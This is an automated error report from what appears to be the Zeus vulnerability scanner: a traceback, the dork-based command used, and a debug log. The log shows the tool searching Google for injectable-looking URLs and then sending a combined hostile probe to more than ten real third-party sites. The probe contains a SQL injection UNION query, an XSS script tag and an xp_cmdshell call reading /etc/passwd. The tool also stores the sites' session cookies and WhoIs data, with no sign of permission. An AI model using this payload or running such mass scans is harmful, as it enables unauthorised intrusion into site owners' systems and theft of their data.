HTTPError: HTTP Error 500: Internal Server Error (hZtJBjI)

[ZeusIssueReporter]

Zeus version: 1.2.8.d4c1e2

Firefox version: (56, 0)

Geckodriver version: geckodriver-v0.19.0-linux64.tar.gz

Error info:

  File "zeus.py", line 374, in <module>
    __run_attacks_main()
  File "zeus.py", line 299, in __run_attacks_main
    threads=opt.amountOfThreads
  File "/home/baal/bin/python/zeus-scanner/lib/core/settings.py", line 1011, in run_attacks
    url, verbose=verbose, timeout=timeout
  File "/home/baal/bin/python/zeus-scanner/lib/attacks/whois_lookup/whois.py", line 104, in whois_lookup_main
    raw_information = gather_raw_whois_info(domain)
  File "/home/baal/bin/python/zeus-scanner/lib/attacks/whois_lookup/whois.py", line 45, in gather_raw_whois_info
    data = urllib2.urlopen(request).read()
  File "/usr/lib/python2.7/urllib2.py", line 154, in urlopen
    return opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 435, in open
    response = meth(req, response)
  File "/usr/lib/python2.7/urllib2.py", line 548, in http_response
    'http', request, response, code, msg, hdrs)
  File "/usr/lib/python2.7/urllib2.py", line 473, in error
    return self._call_chain(*args)
  File "/usr/lib/python2.7/urllib2.py", line 407, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 556, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
HTTPError: HTTP Error 500: Internal Server Error

Running details: Linux-4.10.0-38-generic-x86_64-with-Ubuntu-17.04-zesty

Commands used: zeus.py -d inurl:.php?path= OR index?id=10 OR status?id=10 OR item?id=10 OR base?id=10 --verbose -w --random-agent --batch -M -L 10000

Log file info:

2017-11-13 13:05:29,907;zeus-log;DEBUG;verifying operating system...
2017-11-13 13:05:29,907;zeus-log;DEBUG;already ran, skipping...
2017-11-13 13:05:29,908;zeus-log;DEBUG;running with options '{'searchMultiplePages': True, 'useRandomAgent': True, 'runInBatch': True, 'performWhoisLookup': True, 'runInVerbose': True, 'amountToSearch': 10000, 'dorkToUse': 'inurl:.php?path= OR index?id=10 OR status?id=10 OR item?id=10 OR base?id=10'}'...
2017-11-13 13:05:29,908;zeus-log;INFO;log file being saved to '/home/baal/bin/python/zeus-scanner/log/zeus-log-1.log'...
2017-11-13 13:05:29,908;zeus-log;DEBUG;grabbing random user-agent from '/home/baal/bin/python/zeus-scanner/etc/text_files/agents.txt'...
2017-11-13 13:05:29,909;zeus-log;DEBUG;using default search engine (Google)...
2017-11-13 13:05:29,909;zeus-log;INFO;using default search engine...
2017-11-13 13:05:29,909;zeus-log;INFO;searching Google using dork 'inurl:.php?path= OR index?id=10 OR status?id=10 OR item?id=10 OR base?id=10' for a total of 10000 links...
2017-11-13 13:05:29,910;zeus-log;WARNING;searching multiple pages will not be done on Google...
2017-11-13 13:05:29,910;zeus-log;DEBUG;searching page number 1...
2017-11-13 13:05:34,416;zeus-log;DEBUG;searching page number 2...
2017-11-13 13:05:38,697;zeus-log;DEBUG;searching page number 3...
2017-11-13 13:05:40,406;zeus-log;DEBUG;searching page number 4...
2017-11-13 13:05:44,407;zeus-log;DEBUG;searching page number 5...
2017-11-13 13:05:46,128;zeus-log;DEBUG;searching page number 6...
2017-11-13 13:05:48,430;zeus-log;DEBUG;searching page number 7...
2017-11-13 13:05:50,536;zeus-log;DEBUG;searching page number 8...
2017-11-13 13:05:52,653;zeus-log;DEBUG;searching page number 9...
2017-11-13 13:05:56,905;zeus-log;DEBUG;searching page number 10...
2017-11-13 13:05:56,905;zeus-log;INFO;currently on page 10 of search results...
2017-11-13 13:06:00,979;zeus-log;DEBUG;searching page number 11...
2017-11-13 13:06:05,011;zeus-log;DEBUG;searching page number 12...
2017-11-13 13:06:06,662;zeus-log;DEBUG;searching page number 13...
2017-11-13 13:06:07,190;zeus-log;WARNING;no more results found for given query 'inurl:.php?path= OR index?id=10 OR status?id=10 OR item?id=10 OR base?id=10'...
2017-11-13 13:06:07,190;zeus-log;INFO;a total of 119 URL(s) found out of the requested 10000...
2017-11-13 13:06:07,191;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/url-log/url-log-1.log'...
2017-11-13 13:06:07,191;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:07,192;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:07,192;zeus-log;DEBUG;attempting connection to 'http://www.heathernova.net/modules/tinyd4/index.php?id=10 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:06:08,263;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:06:08,263;zeus-log;DEBUG;loading XML data...
2017-11-13 13:06:08,265;zeus-log;INFO;attempting to get request headers for 'http://www.heathernova.net/modules/tinyd4/index.php?id=10'...
2017-11-13 13:06:09,133;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:06:09,134;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/www.heathernova.net-cookie.log'...
2017-11-13 13:06:09,134;zeus-log;DEBUG;fetched {'X-Powered-By': 'PHP/5.1.6, PleskLin', 'Transfer-Encoding': 'chunked', 'Set-Cookie': 'PHPSESSID=ia2kkogfeciascjkmbj3h46t02; path=/', 'Expires': 'Mon, 26 Jul 1997 05:00:00 GMT', 'Server': 'Apache/2.2.3 (CentOS)', 'Connection': 'close', 'Pragma': 'no-cache', 'Cache-Control': 'private, no-cache', 'Date': 'Mon, 13 Nov 2017 19:06:08 GMT', 'Content-Type': 'text/html; charset=ISO-8859-1'}...
2017-11-13 13:06:09,135;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/www.heathernova.net-headers.json'...
2017-11-13 13:06:09,136;zeus-log;INFO;performing WhoIs lookup on given domain 'www.heathernova.net'...
2017-11-13 13:06:09,977;zeus-log;INFO;discovered raw information...
2017-11-13 13:06:09,978;zeus-log;INFO;gathering interesting information...
2017-11-13 13:06:09,980;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/www.heathernova.net-whois.json'...
2017-11-13 13:06:09,980;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:09,980;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:09,981;zeus-log;DEBUG;attempting connection to 'http://www.kbdconstruction.com/index.php?option=com_weblinks&task=view&catid=2&id=10 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:06:10,226;zeus-log;WARNING;detection request timed out, assuming no protection and continuing...
2017-11-13 13:06:10,226;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:06:10,226;zeus-log;DEBUG;loading XML data...
2017-11-13 13:06:10,227;zeus-log;INFO;attempting to get request headers for 'http://www.kbdconstruction.com/index.php?option=com_weblinks&task=view&catid=2&id=10'...
2017-11-13 13:06:10,836;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:06:10,837;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/www.kbdconstruction.com-cookie.log'...
2017-11-13 13:06:10,837;zeus-log;DEBUG;fetched {'Content-Length': '797', 'X-Powered-By': 'ASP.NET', 'Set-Cookie': 'NSC_ENA-EOO2-WT-IUUQ=ffffffff090c0c0845525d5f4f58455e445a4a423660;expires=Mon, 13-Nov-2017 19:16:27 GMT;path=/;httponly', 'Accept-Ranges': 'bytes', 'Server': 'Microsoft-IIS/8.5', 'Last-Modified': 'Mon, 15 Oct 2012 15:25:50 GMT', 'ETag': '"81f565be9aacd1:0"', 'Date': 'Mon, 13 Nov 2017 19:06:10 GMT', 'Content-Type': 'text/html'}...
2017-11-13 13:06:10,838;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/www.kbdconstruction.com-headers.json'...
2017-11-13 13:06:10,839;zeus-log;INFO;performing WhoIs lookup on given domain 'www.kbdconstruction.com'...
2017-11-13 13:06:11,576;zeus-log;INFO;discovered raw information...
2017-11-13 13:06:11,576;zeus-log;INFO;gathering interesting information...
2017-11-13 13:06:11,578;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/www.kbdconstruction.com-whois.json'...
2017-11-13 13:06:11,578;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:11,578;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:11,579;zeus-log;DEBUG;attempting connection to 'http://akd.apnstatic.com/media/html/sr/en/privacy.html AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:06:11,857;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:06:11,858;zeus-log;DEBUG;loading XML data...
2017-11-13 13:06:11,861;zeus-log;INFO;attempting to get request headers for 'http://akd.apnstatic.com/media/html/sr/en/privacy.html'...
2017-11-13 13:06:12,200;zeus-log;DEBUG;fetched {'Content-Length': '192', 'Content-Encoding': 'gzip', 'Vary': 'Accept-Encoding', 'Server': 'Apache', 'Connection': 'keep-alive', 'Cache-Control': 'max-age=31536000', 'Date': 'Mon, 13 Nov 2017 19:06:11 GMT', 'Content-Type': 'text/html; charset=iso-8859-1'}...
2017-11-13 13:06:12,201;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/akd.apnstatic.com-headers.json'...
2017-11-13 13:06:12,203;zeus-log;INFO;performing WhoIs lookup on given domain 'akd.apnstatic.com'...
2017-11-13 13:06:12,758;zeus-log;INFO;discovered raw information...
2017-11-13 13:06:12,758;zeus-log;INFO;gathering interesting information...
2017-11-13 13:06:12,759;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/akd.apnstatic.com-whois.json'...
2017-11-13 13:06:12,760;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:12,760;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:12,760;zeus-log;DEBUG;attempting connection to 'https://docs.binom.org/api.php AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:06:13,080;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:06:13,080;zeus-log;DEBUG;loading XML data...
2017-11-13 13:06:13,081;zeus-log;INFO;attempting to get request headers for 'https://docs.binom.org/api.php'...
2017-11-13 13:06:13,328;zeus-log;DEBUG;fetched {'Date': 'Mon, 13 Nov 2017 19:06:13 GMT', 'Content-Length': '206', 'Content-Type': 'text/html; charset=iso-8859-1', 'Connection': 'keep-alive', 'Server': 'nginx'}...
2017-11-13 13:06:13,330;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/docs.binom.org-headers.json'...
2017-11-13 13:06:13,330;zeus-log;INFO;performing WhoIs lookup on given domain 'docs.binom.org'...
2017-11-13 13:06:13,799;zeus-log;INFO;discovered raw information...
2017-11-13 13:06:13,800;zeus-log;INFO;gathering interesting information...
2017-11-13 13:06:13,801;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/docs.binom.org-whois.json'...
2017-11-13 13:06:13,802;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:13,802;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:13,802;zeus-log;DEBUG;attempting connection to 'http://lilyjamesbr.com.metaklick.com/index.php?q=aHR0cDovL3RpbmtlcnBvcC5hcGFjaGUub3JnL2RvY3MvY3VycmVudC9yZWZlcmVuY2UvI25lbzRqLWdyZW1saW4 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:06:14,481;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:06:14,482;zeus-log;DEBUG;loading XML data...
2017-11-13 13:06:14,483;zeus-log;INFO;attempting to get request headers for 'http://lilyjamesbr.com.metaklick.com/index.php?q=aHR0cDovL3RpbmtlcnBvcC5hcGFjaGUub3JnL2RvY3MvY3VycmVudC9yZWZlcmVuY2UvI25lbzRqLWdyZW1saW4'...
2017-11-13 13:06:14,780;zeus-log;DEBUG;fetched {'Transfer-Encoding': 'chunked', 'Expires': 'Mon, 13 Nov 2017 19:16:14 GMT', 'Server': 'nginx', 'Connection': 'close', 'Cache-Control': 'max-age=600', 'Date': 'Mon, 13 Nov 2017 19:06:14 GMT', 'Content-Type': 'text/html; charset=utf-8'}...
2017-11-13 13:06:14,781;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/lilyjamesbr.com.metaklick.com-headers.json'...
2017-11-13 13:06:14,781;zeus-log;INFO;performing WhoIs lookup on given domain 'lilyjamesbr.com.metaklick.com'...
2017-11-13 13:06:15,338;zeus-log;INFO;discovered raw information...
2017-11-13 13:06:15,338;zeus-log;INFO;gathering interesting information...
2017-11-13 13:06:15,339;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/lilyjamesbr.com.metaklick.com-whois.json'...
2017-11-13 13:06:15,340;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:15,340;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:15,340;zeus-log;DEBUG;attempting connection to 'http://develop.the9edu.com/link.php?jump=https%3A//en.wikipedia.org/wiki/Object-relational_mapping AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:06:18,840;zeus-log;WARNING;identified WAF/IDS/IPS is unknown to Zeus, if you know the firewall and the context of the firewall, please create an issue (https://github.com/ekultek/zeus-scanner/issues), fingerprint of the firewall will be written to a log file...
2017-11-13 13:06:18,854;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/unknown-firewall/develop.the9edu.com-fingerprint.html'...
2017-11-13 13:06:18,855;zeus-log;WARNING;the target URL WAF/IDS/IPS has been identified as 'Generic (Unknown)'...
2017-11-13 13:06:18,855;zeus-log;DEBUG;loading XML data...
2017-11-13 13:06:18,856;zeus-log;INFO;attempting to get request headers for 'http://develop.the9edu.com/link.php?jump=https%3A//en.wikipedia.org/wiki/Object-relational_mapping'...
2017-11-13 13:06:19,947;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:06:19,948;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/develop.the9edu.com-cookie.log'...
2017-11-13 13:06:19,949;zeus-log;DEBUG;fetched {'Content-Length': '16717', 'Content-language': 'en', 'X-Powered-By': 'HHVM/3.18.6-dev', 'X-Cache-Status': 'hit-front', 'Last-Modified': 'Mon, 30 Oct 2017 11:34:47 GMT', 'X-Client-IP': '2600:8803:b800:8680:f08c:5d71:964b:c32c', 'Link': '</static/images/project-logos/enwiki.png>;rel=preload;as=image;media=not all and (min-resolution: 1.5dppx),</static/images/project-logos/enwiki-1.5x.png>;rel=preload;as=image;media=(min-resolution: 1.5dppx) and (max-resolution: 1.999999dppx),</static/images/project-logos/enwiki-2x.png>;rel=preload;as=image;media=(min-resolution: 2dppx)', 'Date': 'Mon, 13 Nov 2017 19:06:19 GMT', 'Accept-Ranges': 'bytes', 'X-Varnish': '246462398 36879399, 409864875 344585791', 'X-Cache': 'cp1054 hit/5, cp1055 hit/8', 'Set-Cookie': 'WMF-Last-Access=13-Nov-2017;Path=/;HttpOnly;secure;Expires=Fri, 15 Dec 2017 12:00:00 GMT, WMF-Last-Access-Global=13-Nov-2017;Path=/;Domain=.wikipedia.org;HttpOnly;secure;Expires=Fri, 15 Dec 2017 12:00:00 GMT, GeoIP=US:OK:Edmond:35.62:-97.48:v4; Path=/; secure; Domain=.wikipedia.org', 'Age': '27092', 'Strict-Transport-Security': 'max-age=106384710; includeSubDomains; preload', 'Server': 'mw1247.eqiad.wmnet', 'Connection': 'keep-alive', 'P3P': 'CP="This is not a P3P policy! See https://en.wikipedia.org/wiki/Special:CentralAutoLogin/P3P for more info."', 'Via': '1.1 varnish-v4, 1.1 varnish-v4', 'X-Analytics': 'ns=0;page_id=59202;https=1;nocookies=1', 'X-Content-Type-Options': 'nosniff', 'Content-Encoding': 'gzip', 'Vary': 'Accept-Encoding,Cookie,Authorization', 'X-UA-Compatible': 'IE=Edge', 'Cache-Control': 'private, s-maxage=0, max-age=0, must-revalidate', 'Content-Type': 'text/html; charset=UTF-8', 'Backend-Timing': 'D=69302 t=1510572887249262'}...
2017-11-13 13:06:19,949;zeus-log;WARNING;provided target has protection against MIME type attacks...
2017-11-13 13:06:19,950;zeus-log;WARNING;provided target has protection against unencrypted connections (force HTTPS connection)...
2017-11-13 13:06:19,951;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/develop.the9edu.com-headers.json'...
2017-11-13 13:06:19,951;zeus-log;INFO;performing WhoIs lookup on given domain 'develop.the9edu.com'...
2017-11-13 13:06:20,537;zeus-log;INFO;discovered raw information...
2017-11-13 13:06:20,538;zeus-log;INFO;gathering interesting information...
2017-11-13 13:06:20,539;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/develop.the9edu.com-whois.json'...
2017-11-13 13:06:20,540;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:20,540;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:20,540;zeus-log;DEBUG;attempting connection to 'http://www.buddhistchannel.tv/index.php?id=10,9120,0,0,1,0 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:06:21,085;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:06:21,085;zeus-log;DEBUG;loading XML data...
2017-11-13 13:06:21,086;zeus-log;INFO;attempting to get request headers for 'http://www.buddhistchannel.tv/index.php?id=10,9120,0,0,1,0'...
2017-11-13 13:06:21,449;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:06:21,450;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/www.buddhistchannel.tv-cookie.log'...
2017-11-13 13:06:21,450;zeus-log;DEBUG;fetched {'Content-Encoding': 'gzip', 'Transfer-Encoding': 'chunked', 'Set-Cookie': 'hashID=06a46bbe89ff9e7e19f860d7efe3eb29; path=/', 'Expires': 'Thu, 19 Nov 1981 08:52:00 GMT', 'Vary': 'Accept-Encoding', 'Keep-Alive': 'timeout=2, max=1000', 'Server': 'Apache', 'Connection': 'Keep-Alive', 'Pragma': 'no-cache', 'Cache-Control': 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0', 'Date': 'Mon, 13 Nov 2017 19:06:21 GMT', 'Content-Type': 'text/html'}...
2017-11-13 13:06:21,451;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/www.buddhistchannel.tv-headers.json'...
2017-11-13 13:06:21,451;zeus-log;INFO;performing WhoIs lookup on given domain 'www.buddhistchannel.tv'...
2017-11-13 13:06:22,493;zeus-log;INFO;discovered raw information...
2017-11-13 13:06:22,494;zeus-log;INFO;gathering interesting information...
2017-11-13 13:06:22,496;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/www.buddhistchannel.tv-whois.json'...
2017-11-13 13:06:22,496;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:22,496;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:22,497;zeus-log;DEBUG;attempting connection to 'http://www.inmotionhosting.com/support/edu/website-design/using-php-and-mysql/grab-all-comments-from-database AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:06:22,685;zeus-log;WARNING;detection request timed out, assuming no protection and continuing...
2017-11-13 13:06:22,686;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:06:22,686;zeus-log;DEBUG;loading XML data...
2017-11-13 13:06:22,687;zeus-log;INFO;attempting to get request headers for 'http://www.inmotionhosting.com/support/edu/website-design/using-php-and-mysql/grab-all-comments-from-database'...
2017-11-13 13:06:23,186;zeus-log;DEBUG;fetched {'Status': '404 Article not found', 'Content-Length': '8717', 'Content-Encoding': 'gzip', 'Expires': 'Wed, 11 Jan 1984 05:00:00 GMT', 'Vary': 'Accept-Encoding', 'Server': 'nginx/1.13.4', 'Connection': 'keep-alive', 'Pragma': 'no-cache', 'Cache-Control': 'max-age=0, no-cache, no-store, must-revalidate', 'Date': 'Mon, 13 Nov 2017 19:06:23 GMT', 'P3P': 'CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"', 'Content-Type': 'text/html; charset=utf-8'}...
2017-11-13 13:06:23,187;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/www.inmotionhosting.com-headers.json'...
2017-11-13 13:06:23,188;zeus-log;INFO;performing WhoIs lookup on given domain 'www.inmotionhosting.com'...
2017-11-13 13:06:23,983;zeus-log;INFO;discovered raw information...
2017-11-13 13:06:23,987;zeus-log;INFO;gathering interesting information...
2017-11-13 13:06:23,989;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/www.inmotionhosting.com-whois.json'...
2017-11-13 13:06:23,990;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:23,990;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:23,990;zeus-log;DEBUG;attempting connection to 'http://angularcode.com/demo-of-a-simple-crud-restful-php-service-used-with-angularjs-and-mysql/ AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:06:24,239;zeus-log;WARNING;detection request timed out, assuming no protection and continuing...
2017-11-13 13:06:24,240;zeus-log;INFO;no WAF/IDS/IPS has been identified on target URL...
2017-11-13 13:06:24,240;zeus-log;DEBUG;loading XML data...
2017-11-13 13:06:24,240;zeus-log;INFO;attempting to get request headers for 'http://angularcode.com/demo-of-a-simple-crud-restful-php-service-used-with-angularjs-and-mysql/'...
2017-11-13 13:06:24,388;zeus-log;DEBUG;fetched {'Content-Encoding': 'gzip', 'Transfer-Encoding': 'chunked', 'X-GitHub-Request-Id': 'A570:3935:36043:4B345:5A09ED30', 'Server': 'GitHub.com', 'ETag': 'W/"59afc5c5-6725"', 'Date': 'Mon, 13 Nov 2017 19:06:24 GMT', 'Access-Control-Allow-Origin': '*', 'Content-Type': 'text/html; charset=utf-8'}...
2017-11-13 13:06:24,389;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/angularcode.com-headers.json'...
2017-11-13 13:06:24,389;zeus-log;INFO;performing WhoIs lookup on given domain 'angularcode.com'...
2017-11-13 13:06:27,243;zeus-log;INFO;discovered raw information...
2017-11-13 13:06:27,244;zeus-log;INFO;gathering interesting information...
2017-11-13 13:06:27,245;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/angularcode.com-whois.json'...
2017-11-13 13:06:27,246;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:27,246;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:27,246;zeus-log;DEBUG;attempting connection to 'http://www.kleemannlifts.com/index.php?option=com_k2&view=itemlist&layout=category&task=category&id=10&Itemid=212&lang=en AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:06:28,017;zeus-log;WARNING;identified WAF/IDS/IPS is unknown to Zeus, if you know the firewall and the context of the firewall, please create an issue (https://github.com/ekultek/zeus-scanner/issues), fingerprint of the firewall will be written to a log file...
2017-11-13 13:06:28,018;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/unknown-firewall/www.kleemannlifts.com-fingerprint.html'...
2017-11-13 13:06:28,018;zeus-log;WARNING;the target URL WAF/IDS/IPS has been identified as 'Generic (Unknown)'...
2017-11-13 13:06:28,019;zeus-log;DEBUG;loading XML data...
2017-11-13 13:06:28,020;zeus-log;INFO;attempting to get request headers for 'http://www.kleemannlifts.com/index.php?option=com_k2&view=itemlist&layout=category&task=category&id=10&Itemid=212&lang=en'...
2017-11-13 13:06:29,023;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:06:29,034;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/www.kleemannlifts.com-cookie.log'...
2017-11-13 13:06:29,034;zeus-log;DEBUG;fetched {'Transfer-Encoding': 'chunked', 'Set-Cookie': 'f678f59a4236c631427aee89c03b4fc9=kdei69lofelfu446lto36tq1g3; path=/, lang=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/, jfcookie=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/, jfcookie[lang]=en; expires=Tue, 14-Nov-2017 19:06:27 GMT; Max-Age=86400; path=/', 'X-Logged-In': 'False', 'Expires': 'Mon, 1 Jan 2001 00:00:00 GMT', 'Keep-Alive': 'timeout=5, max=100', 'Server': 'Apache', 'Last-Modified': 'Mon, 13 Nov 2017 19:06:28 GMT', 'Connection': 'Keep-Alive', 'Pragma': 'no-cache', 'Cache-Control': 'post-check=0, pre-check=0', 'Date': 'Mon, 13 Nov 2017 19:06:27 GMT', 'P3P': 'CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"', 'Content-Type': 'text/html; charset=utf-8'}...
2017-11-13 13:06:29,035;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/www.kleemannlifts.com-headers.json'...
2017-11-13 13:06:29,035;zeus-log;INFO;performing WhoIs lookup on given domain 'www.kleemannlifts.com'...
2017-11-13 13:06:29,729;zeus-log;INFO;discovered raw information...
2017-11-13 13:06:29,757;zeus-log;INFO;gathering interesting information...
2017-11-13 13:06:29,758;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/whois/www.kleemannlifts.com-whois.json'...
2017-11-13 13:06:29,758;zeus-log;INFO;checking URL headers...
2017-11-13 13:06:29,759;zeus-log;INFO;checking if target URL is protected by some kind of WAF/IPS/IDS...
2017-11-13 13:06:29,759;zeus-log;DEBUG;attempting connection to 'http://www.bobavey.com/index.php?option=com_content&view=section&layout=blog&id=10&Itemid=429 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#'...
2017-11-13 13:06:30,080;zeus-log;WARNING;identified WAF/IDS/IPS is unknown to Zeus, if you know the firewall and the context of the firewall, please create an issue (https://github.com/ekultek/zeus-scanner/issues), fingerprint of the firewall will be written to a log file...
2017-11-13 13:06:30,080;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/unknown-firewall/www.bobavey.com-fingerprint.html'...
2017-11-13 13:06:30,080;zeus-log;WARNING;the target URL WAF/IDS/IPS has been identified as 'Generic (Unknown)'...
2017-11-13 13:06:30,081;zeus-log;DEBUG;loading XML data...
2017-11-13 13:06:30,081;zeus-log;INFO;attempting to get request headers for 'http://www.bobavey.com/index.php?option=com_content&view=section&layout=blog&id=10&Itemid=429'...
2017-11-13 13:06:30,742;zeus-log;INFO;found a request cookie, saving to file...
2017-11-13 13:06:30,743;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/cookies/www.bobavey.com-cookie.log'...
2017-11-13 13:06:30,743;zeus-log;DEBUG;fetched {'X-XSS-Protection': '1; mode=block', 'X-Powered-By': 'PleskLin', 'Transfer-Encoding': 'chunked', 'Set-Cookie': 'fdbd095faa8d7658e65282dd75166f6e=khj4ik40h0d48mucl7dkubt3p0; path=/', 'Expires': 'Mon, 1 Jan 2001 00:00:00 GMT', 'Vary': 'Accept-Encoding', 'Server': 'Apache', 'Last-Modified': 'Mon, 13 Nov 2017 19:06:30 GMT', 'Connection': 'close', 'Pragma': 'no-cache', 'Cache-Control': 'post-check=0, pre-check=0', 'Date': 'Mon, 13 Nov 2017 19:06:30 GMT', 'P3P': 'CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"', 'Content-Type': 'text/html; charset=utf-8', 'Content-Encoding': 'gzip'}...
2017-11-13 13:06:30,743;zeus-log;WARNING;provided target has protection against XSS attacks...
2017-11-13 13:06:30,744;zeus-log;INFO;successfully wrote found items to '/home/baal/bin/python/zeus-scanner/log/header-log/www.bobavey.com-headers.json'...
